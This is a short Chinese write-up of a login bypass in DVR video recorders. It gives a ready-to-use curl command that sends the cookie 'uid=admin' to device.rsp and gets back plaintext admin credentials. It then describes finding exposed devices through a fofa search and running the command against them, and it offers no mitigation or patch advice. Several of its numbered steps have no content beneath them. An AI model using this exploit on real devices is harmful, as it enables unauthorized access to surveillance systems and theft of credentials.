多款DVR硬盘录像机存在登录绕过漏洞（CVE-2018-2019）

搜索此漏洞编号，并无实际信息

搜索此为DVR设备 

漏洞描述

DVR，全称为Digital Video Recorder(硬盘录像机)，即数字视频录像机。最初由阿根廷研究员发现，通过使用“Cookie： uid = admin”的Cookie标头来访问特定DVR的控制面板，DVR将以明文形式响应设备的管理员凭证。

 

用命令 

curl "http://xxx.xxx.xxx.xxx/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

可以获取DVR信息

 

 

1、fofa搜索device.rsp文件信息

 

 

2、使用Cur命令 

进行获取登陆信息

 

 

登陆账户信息已经获取完毕

 

End!!!